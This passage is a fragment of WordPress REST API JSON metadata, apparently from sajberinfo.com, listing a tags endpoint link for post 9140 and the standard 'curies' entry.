mbeddable":true,"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/tags?post=9140"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}